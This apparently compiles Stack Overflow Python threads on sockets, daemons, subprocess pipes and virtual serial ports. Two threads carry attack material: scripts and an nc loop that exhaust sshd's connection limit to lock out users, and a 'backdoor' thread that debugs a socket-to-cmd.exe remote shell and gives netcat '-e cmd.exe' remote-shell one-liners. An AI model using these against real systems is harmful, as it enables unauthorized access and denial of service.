socket handle leak in pyzmq? - python

Hi good people of StackOverflow.
I'm using pyzmq and I've got some long-running processes, which led to a discovery that socket handles are being left open. I've narrowed the offending code down to the following:
import zmq
uri = 'tcp://127.0.0.1'
sock_type = zmq.REQ
linger = 250
# Observe output of lsof -p <pid> here and see no socket handles
ctx = zmq.Context.instance()
sock = ctx.socket(sock_type)
sock.setsockopt(zmq.LINGER, linger)
port = sock.bind_to_random_port(uri)
# Observe output of lsof -p <pid> here and see many socket handles
sock.close() # lsof -p <pid> still showing many socket handles
ctx.destroy() # Makes no difference
pyzmq version is pyzmq-13.1.0
Either there is a bug in pyzmq, or I'm doing something incorrectly. I hope you can help me!!
Thanks!

After a chat with pieterh and minrk on #zeromq, we found the cause.
ctx.destroy() in 13.1.0 has an indentation bug so it only calls Context.term() if there is an unclosed socket.
Workaround: call ctx.term() instead, and make sure all of your sockets are closed before you do.
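For clarity, here is a minimal sketch of that workaround applied to the snippet above:
import zmq

ctx = zmq.Context.instance()
sock = ctx.socket(zmq.REQ)
sock.setsockopt(zmq.LINGER, 250)
port = sock.bind_to_random_port('tcp://127.0.0.1')

# ... use the socket ...

sock.close()  # close every socket first; term() blocks on unclosed sockets
ctx.term()    # instead of ctx.destroy(), which is broken in 13.1.0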

Related

How to move SimpleSocket server into a background process

I have a simple socketServer that works perfectly on the main thread.
#Server PORT
PORT = 8020
#reassign variables
Handler = Server #this is a SimpleHTTPHandler
httpd = SocketServer.TCPServer(("", PORT), Handler)
httpd.serve_forever()
I need to have this run in the background and have the ability to stop the process at will. What is the proper way to do this?
EDIT
Sorry I was unclear. I need to have the server running non-stop, and I can only access the system over SSH, so I can't just start it and walk away.
Assuming you are running your script on a POSIX operating system and your script is named socket_server.py, you can use nohup like this:
$ nohup python socket_server.py >> /dev/null 2>&1 &
That will put your script in the background, make it immune to hangups, and you can exit your SSH session. The shell will print out the job number and PID:
[1] 1234
You can stop it later by sending it a SIGTERM using kill:
$ kill -SIGTERM 1234
You might need threading/_thread:
import _thread

def server():
    ...  # your server setup and httpd.serve_forever() go here

_thread.start_new_thread(server, ())
This basically starts the server function on a different thread.
EDIT:
In this case, inside your def server() you check a global variable threadIsRunning: while it is True the server keeps running, and when it is set to False you call _thread.exit(). This check should live inside some sort of loop.
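Alternatively, the stdlib gives you a cleaner stop mechanism than a global flag: run serve_forever() on a threading.Thread and call shutdown() from the main thread. A minimal sketch, assuming Python 2 and the question's SocketServer setup (SimpleHTTPRequestHandler stands in for your handler):
import threading
import SocketServer
import SimpleHTTPServer

PORT = 8020
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler  # stand-in for your handler
httpd = SocketServer.TCPServer(("", PORT), Handler)

# serve_forever() blocks until shutdown() is called from another thread
t = threading.Thread(target=httpd.serve_forever)
t.daemon = True   # don't keep the interpreter alive on exit
t.start()

# ... later, to stop the server at will:
httpd.shutdown()       # unblocks serve_forever()
httpd.server_close()   # release the listening socket
t.join()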

SSH Max Connection Ruby Script Not Working Properly

Most sshd installs have a default limit of 10 connections. If you exceed this, all users who attempt to connect to the server will receive the error ssh_exchange_identification: Connection closed by remote host. This can be demonstrated with the simple bash one-liner for i in {0..12}; do nc targetserver.com 22 & done. I also wrote a python script to demonstrate this:
#!/usr/bin/env python
import socket
socks=[]
print "Building sockets. . ."
for i in range(20):
    socks.append(socket.socket(2,1))
    socks[i].connect(('localhost',22))
while 1:
    pass
print "Done."
which works perfectly. I then attempted to create the same script using ruby:
#!/usr/bin/env ruby
require 'socket'
socks = Array.new(20)
puts "Building sockets...\n"
for i in 0..19
  socks[i] = TCPSocket.new('localhost', 22)
end
puts "Done.\n"
while (true) do
end
The ruby script does not get any errors and prints the expected output, but does not result in preventing other users from connecting to ssh. I verified that the ruby script is creating sockets with another python script I wrote:
#!/usr/bin/python
from socket import socket as sock, SO_REUSEADDR as REUSE, SOL_SOCKET as SOL
host='localhost'
port=5555
s=sock(2,1)
s.setsockopt(SOL, REUSE, 1)
s.bind((host,port))
s.listen(port)
i=0
while 1:
    s.accept()
    i += 1
    print i
And changing the destination port to 5555.
The only thing that comes to mind is that the sockets might be closing, but I don't know why that would be. Is there anything else that would prevent this script from working?

python script starting 2 daemons

My plan is to provide a script just as the title states. I've got an idea which I'll describe below. If you think something sounds bad/stupid, I'd be grateful for any constructive comments, improvements, etc.
There are 2 services I want to start as daemons. One is required (a caching service), one is optional (http access to the caching service). I use the argparse module to get --port for the caching service port and an optional --http-port for http access. I already have this and it works. Now I'd like to start the daemons. The services are based on twisted, so they have to start the reactor loop. So far I would like to have two different processes: one for the service and a second one for http access (though I know it might be done in a single async process).
Since starting the twisted service is done via the reactor loop (which is Python code, not a shell script, since I don't use twistd yet), I think that using os.fork is better than subprocess (which would need a command-line command to start the process). I can use os.fork to start the daemons and touch service.pid and http.pid files, but I don't know how to access the child pid, since os.fork returns 0 for the child.
So the child PID is what I'm missing. Moreover, if anything seems illogical or overcomplicated, please comment on that.
My current code looks like this:
#!/usr/bin/python
import argparse
import os
from twisted.internet import reactor

parser = argparse.ArgumentParser(description='Run PyCached server.')
parser.add_argument('port', metavar='port', type=int,
                    help='PyCached service port')
parser.add_argument('--http-port', metavar='http-port', type=int, default=None,
                    help='PyCached http access port')
args = parser.parse_args()

def dumpPid(name):
    f = open(name + '.pid', 'w')
    f.write(str(os.getpid()))
    f.flush()
    f.close()

def erasePid(name):
    os.remove(name + '.pid')

def run(name, port, factory):
    dumpPid(name)
    print "Starting PyCached %s on port %d" % (name, port)
    reactor.listenTCP(port, factory)
    reactor.run()
    erasePid(name)
    print "Successfully stopped PyCached %s" % (name,)

# start service (required)
fork_pid = os.fork()
if fork_pid == 0:
    from server.service import PyCachedFactory
    run('service', args.port, PyCachedFactory())
else:
    # start http access (optional)
    if args.http_port:
        fork_pid = os.fork()
        if fork_pid == 0:
            from server.http import PyCachedSite
            addr = ('localhost', args.port)
            run('http', args.http_port, PyCachedSite(addr))
        else:
            pass
I run it with:
./run.py 8001 # with main service only
or:
./run.py 8001 --http-port 8002 # with additional http
System shutdown is done via single shell script:
#!/bin/bash

function close {
    f="$1.pid"
    if [ -f "$f" ]
    then
        kill -s SIGTERM `cat "$f"`
    fi
}

close http
close service
Since starting the twisted service is done via the reactor loop (which is Python code, not a shell script, since I don't use twistd yet), I think that using os.fork is better than subprocess (which would need a command-line command to start the process).
You should use twistd. If not, then you should write a Python script for launching the daemon. Then you should use the subprocess module (or reactor.spawnProcess) to launch the child process.
Using os.fork without immediately proceeding to one of the os.exec* functions is broken. A large amount of state is shared between the parent and child created by os.fork. You can't be sure that this sharing won't break something (and I can tell you it will break some things in Twisted).
Here are some links to discussions of fork-without-exec issues that might help you get more of an idea of what a troublesome area this is.
Twisted epoll reactor issues - https://twistedmatrix.com/pipermail/twisted-python/2013-October/027611.html
stdlib ssl security issues - https://mail.python.org/pipermail/python-dev/2013-October/129834.html
is twisted incompatible with multiprocessing events and queues?
multiprocessing memory usage and twisted/gevents
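To illustrate the subprocess suggestion above: the parent gets the child's PID directly from the Popen object, so the parent can write the pid files itself. A minimal sketch (service_launcher.py is a hypothetical script that just runs one reactor and takes a port argument):
import subprocess

def start_daemon(name, script, port):
    # fork+exec a fresh interpreter for the child (no shared reactor state)
    proc = subprocess.Popen(['python', script, str(port)])
    f = open(name + '.pid', 'w')
    f.write(str(proc.pid))  # the parent knows the child's pid directly
    f.close()
    return proc

service = start_daemon('service', 'service_launcher.py', 8001)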

python subprocess stdin.write a string error 22 invalid argument

I have two Python files communicating over a socket. When I pass the data I received to stdin.write, I get error 22, invalid argument. The code:
a="C:\python27\Tools"
proc = subprocess.Popen('cmd.exe', cwd=a ,universal_newlines = True, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
data = s.recv(1024) # s is the socket i created
proc.stdin.write(data) ##### ERROR in this line
output = proc.stdout.readline()
print output.rstrip()
remainder = proc.communicate()[0]
print remainder
Update
OK, basically I want to create something like a backdoor on a system, in a localhost inside a network lab. This is for educational purposes. I have two machines: 1) is running Ubuntu, and on the server I have this code:
import socket,sys
s=socket.socket()
host = "192.168.2.7" #the server's ip
port = 1234
s.bind((host, port))
s.listen(1) #wait for client connection.
c, addr = s.accept() # Establish connection with client.
print 'Got connection from', addr
c.send('Thank you for connecting')
while True:
    command_from_user = raw_input("Give your command: ") #read command from the user
    if command_from_user == 'quit': break
    c.send(command_from_user) #sending the command to client
c.close() # Close the connection
And I have this code for the client:
import socket
import sys
import subprocess, os

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Socket created'
host = "192.168.2.7" #ip of the server machine
port = 1234
s.connect((host,port)) #open a TCP connection to hostname on the port
print s.recv(1024)
a="C:\python27\Tools"
proc = subprocess.Popen('cmd.exe', cwd=a ,universal_newlines = True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
while True:
    data = s.recv(1024)
    if (data == "") or (data=="quit"):
        break
    proc.stdin.write('%s\n' % data)
    proc.stdin.flush()
    remainder = proc.communicate()[0]
    print remainder
stdoutput=proc.stdout.read() + proc.stderr.read()
s.close #closing the socket
And the error is in the client file:
Traceback (most recent call last):
  File "ex1client2.py", line 50, in <module>
    proc.stdin.write('%s\n' % data)
ValueError: I/O operation on closed file
Basically I want to run serial commands from the server on the client and get the output back on the server. The first command is executed; on the second command I get this error message.
The main problem which led me to this solution is with the change-directory command: when I execute cd "path", the directory doesn't change.
Your new code has a different problem, which is why it raises a similar but different error. Let's look at the key part:
while True:
    data = s.recv(1024)
    if (data == "") or (data=="quit"):
        break
    proc.stdin.write('%s\n' % data)
    proc.stdin.flush()
    remainder = proc.communicate()[0]
    print remainder
stdoutput=proc.stdout.read() + proc.stderr.read()
The problem is that each time through this loop, you're calling proc.communicate(). As the docs explain, this will:
Send data to stdin. Read data from stdout and stderr, until end-of-file is reached. Wait for process to terminate.
So, after this call, the child process has quit, and the pipes are all closed. But the next time through the loop, you try to write to its input pipe anyway. Since that pipe has been closed, you get ValueError: I/O operation on closed file, which means exactly what it says.
If you want to run each command in a separate cmd.exe shell instance, you have to move the proc = subprocess.Popen('cmd.exe', …) bit into the loop.
On the other hand, if you want to send commands one by one to the same shell, you can't call communicate; you have to write to stdin, read from stdout and stderr until you know they're done, and leave everything open for the next time through the loop.
The downside of the first one is pretty obvious: if you do a cd \Users\me\Documents in the first command, then dir in the second command, and they're running in completely different shells, you're going to end up getting the directory listing of C:\python27\Tools rather than C:\Users\me\Documents.
But the downside of the second one is pretty obvious too: you need to write code that somehow either knows when each command is done (maybe because you get the prompt again?), or that can block on proc.stdout, proc.stderr, and s all at the same time. (And without accidentally deadlocking the pipes.) And you can't even toss them all into a select, because the pipes aren't sockets. So, the only real option is to create a reader thread for stdout and another one for stderr, or to get one of the async subprocess libraries off PyPI, or to use twisted or another framework that has its own way of doing async subprocess pipes.
If you look at the source to communicate, you can see how the threading should work.
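Here is a minimal, self-contained sketch of that reader-thread approach (the half-second quiet heuristic is just for illustration, not a robust end-of-output detector, and 'dir' is a sample command):
import subprocess, threading, Queue  # Queue is the py2 name ('queue' in py3)

proc = subprocess.Popen('cmd.exe', universal_newlines=True,
                        stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                        stderr=subprocess.PIPE)

def drain(pipe, q, tag):
    # read lines until the pipe closes, handing them to the main thread
    for line in iter(pipe.readline, ''):
        q.put((tag, line))

q = Queue.Queue()
for tag, pipe in (('out', proc.stdout), ('err', proc.stderr)):
    t = threading.Thread(target=drain, args=(pipe, q, tag))
    t.daemon = True
    t.start()

# send one command, then collect whatever output shows up
proc.stdin.write('dir\n')
proc.stdin.flush()
while True:
    try:
        tag, line = q.get(timeout=0.5)
    except Queue.Empty:
        break  # crude: assume the command is done once output goes quiet
    print tag, line.rstrip()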
Meanwhile, as a side note, your code has another very serious problem. You're expecting that each s.recv(1024) is going to return you one command. That's not how TCP sockets work. You'll get the first 2-1/2 commands in one recv, and then 1/4th of a command in the next one, and so on.
On localhost, or even a home LAN, when you're just sending a few small messages around, it will work 99% of the time, but you still have to deal with that 1% or your code will just mysteriously break sometimes. And over the internet, and even many real LANs, it will only work 10% of the time.
So, you have to implement some kind of protocol that delimits messages in some way.
Fortunately, for simple cases, Python gives you a very easy solution to this: makefile. When commands are delimited by newlines, and you can block synchronously until you've got a complete command, this is trivial. Instead of this:
while True:
    data = s.recv(1024)
… just do this:
f = s.makefile()
while True:
    data = f.readline()
You just need to remember to close both f and s later (or s right after the makefile, and f later). A more idiomatic use is:
with s.makefile() as f:
    s.close()
    for data in f:
        ...
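Putting that into your client loop looks something like this sketch, assuming the s and proc from your client code, and that the server is also changed to append '\n' to each command it sends:
f = s.makefile()
for data in f:
    data = data.rstrip('\n')
    if data == '' or data == 'quit':
        break
    proc.stdin.write('%s\n' % data)
    proc.stdin.flush()
    # read this command's output here (see the threading discussion above)
f.close()
s.close()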
One last thing:
OK, basically I want to create something like a backdoor on a system, in a localhost inside a network lab
"localhost" means the same machine you're running one, so "a localhost inside a network lab" doesn't make sense. I assume you just meant "host" here, in which case the whole thing makes sense.
If you don't need to use Python, you can do this whole thing with a one-liner using netcat. There are a few different versions with slightly different syntax. I believe Ubuntu comes with GNU netcat built-in; if not, it's probably installable with apt-get install netcat or apt-get install nc. Windows doesn't come with anything, but you can get ports of almost any variant.
A quick google for "netcat remote shell" turned up a bunch of blog posts, forum messages, and even videos showing how to do this, such as Using Netcat To Spawn A Remote Shell, but you're probably better off googling for netcat tutorials instead.
The more usual design is to have the "backdoor" machine (your Windows box) listen on a port, and the other machine (your Ubuntu box) connect to it, so that's what most of the blog posts/etc. will show you. The advantage of this direction is that your backdoor server listens forever: you can connect up, do some stuff, quit, connect up again later, etc. without having to go back to the Windows box and start a new connection.
But the other way around, with a backdoor client on the Windows box, is just as easy. On your Ubuntu box, start a server that just connects the terminal to the first connection that comes in:
nc -l -p 1234
Then on your Windows box, make a connection to that server, and connect it up to cmd.exe. Assuming you've installed a GNU-syntax variant:
nc -e cmd.exe 192.168.2.7 1234
That's it. A lot simpler than writing it in Python.
For the more typical design, the backdoor server on Windows runs this:
nc -k -l -p 1234 -e cmd.exe
And then you connect up from Ubuntu with:
nc windows.machine.address 1234
Or you can even add -t to the backdoor server, and just connect up with telnet instead of nc.
The problem is that you're not actually opening a subprocess at all, so the pipe is getting closed, so you're trying to write to something that doesn't exist. (I'm pretty sure POSIX guarantees that you'll get an EPIPE here, but on Windows, subprocess isn't using a POSIX pipe in the first place, so there's no guarantee of exactly what you're going to get. But you're definitely going to get some error.)
And the reason that happens is that you're trying to open a program named '\n' (as in a newline, not a backslash and an n). I don't think that's even legal on Windows. And, even if it is, I highly doubt you have an executable named '\n.exe' or the like on your path.
This would be much easier to see if you weren't using shell=True. In that case, the Popen itself would raise an exception (an ENOENT), which would tell you something like:
OSError: [Errno 2] No such file or directory: '
'
… which would be much easier to understand.
In general, you should not be using shell=True unless you really need some shell feature. And it's very rare that you need a shell feature and also need to manually read and write the pipes.
It would also be less confusing if you didn't reuse data to mean two completely different things (the name of the program to run, and the data to pass from the socket to the pipe).

Virtual Serial Device in Python?

I know that I can use e.g. pySerial to talk to serial devices, but what if I don't have a device right now but still need to write a client for it? How can I write a "virtual serial device" in Python and have pySerial talk to it, like I would, say, run a local web server? Maybe I'm just not searching well, but I've been unable to find any information on this topic.
This is something I did, and it has worked for me so far:
import os, pty, serial
master, slave = pty.openpty()
s_name = os.ttyname(slave)
ser = serial.Serial(s_name)
# To Write to the device
ser.write('Your text')
# To read from the device
os.read(master,1000)
If you create more virtual ports you will have no problems as the different masters get different file descriptors even if they have the same name.
If you are running Linux you can use the socat command for this, like so:
socat -d -d pty,raw,echo=0 pty,raw,echo=0
When the command runs, it will inform you of which serial ports it has created. On my machine this looks like:
2014/04/23 15:47:49 socat[31711] N PTY is /dev/pts/12
2014/04/23 15:47:49 socat[31711] N PTY is /dev/pts/13
2014/04/23 15:47:49 socat[31711] N starting data transfer loop with FDs [3,3] and [5,5]
Now I can write to /dev/pts/13 and receive on /dev/pts/12, and vice versa.
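You can then treat the two PTYs as the two ends of a null-modem cable, e.g. from pySerial (the /dev/pts numbers below are just what socat printed on my machine; use yours):
import serial

dev = serial.Serial('/dev/pts/12')     # one end of the socat pair
client = serial.Serial('/dev/pts/13')  # the other end

client.write('hello')
print dev.read(5)  # -> 'hello'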
I was able to emulate an arbitrary serial port ./foo using this code:
SerialEmulator.py
import os, subprocess, serial, time

# this script lets you emulate a serial device
# the client program should use the serial port file specified by client_port
# if the port is a location that the user can't access (ex: /dev/ttyUSB0 often),
# sudo is required

class SerialEmulator(object):
    def __init__(self, device_port='./ttydevice', client_port='./ttyclient'):
        self.device_port = device_port
        self.client_port = client_port
        cmd=['/usr/bin/socat','-d','-d','PTY,link=%s,raw,echo=0' %
             self.device_port, 'PTY,link=%s,raw,echo=0' % self.client_port]
        self.proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        time.sleep(1)
        self.serial = serial.Serial(self.device_port, 9600, rtscts=True, dsrdtr=True)
        self.err = ''
        self.out = ''

    def write(self, out):
        self.serial.write(out)

    def read(self):
        line = ''
        while self.serial.inWaiting() > 0:
            line += self.serial.read(1)
        print line

    def __del__(self):
        self.stop()

    def stop(self):
        self.proc.kill()
        self.out, self.err = self.proc.communicate()
socat needs to be installed (sudo apt-get install socat), as well as the pyserial python package (pip install pyserial).
Open the python interpreter and import SerialEmulator:
>>> from SerialEmulator import SerialEmulator
>>> emulator = SerialEmulator('./ttydevice','./ttyclient')
>>> emulator.write('foo')
>>> emulator.read()
Your client program can then wrap ./ttyclient with pyserial, creating the virtual serial port. You could also make client_port /dev/ttyUSB0 or similar if you can't modify client code, but might need sudo.
Also be aware of this issue: Pyserial does not play well with virtual port
It may be easier to use something like com0com (if you're on Windows) to set up a virtual serial port, and develop on that.
Maybe a loop device will do the job if you need to test your application without access to a device. It's included in pySerial 2.5 https://pythonhosted.org/pyserial/url_handlers.html#loop
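A minimal sketch of the loop:// handler, which echoes everything written back to the same port without touching any OS device:
import serial

# loop:// wires the port's transmit buffer to its own receive buffer
ser = serial.serial_for_url('loop://', timeout=1)
ser.write('ping')
print ser.read(4)  # -> 'ping'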
It depends a bit on what you're trying to accomplish now...
You could wrap access to the serial port in a class and write an implementation to use socket I/O or file I/O. Then write your serial I/O class to use the same interface and plug it in when the device is available. (This is actually a good design for testing functionality without requiring external hardware.)
Or, if you are going to use the serial port for a command line interface, you could use stdin/stdout.
Or, there's this other answer about virtual serial devices for linux.
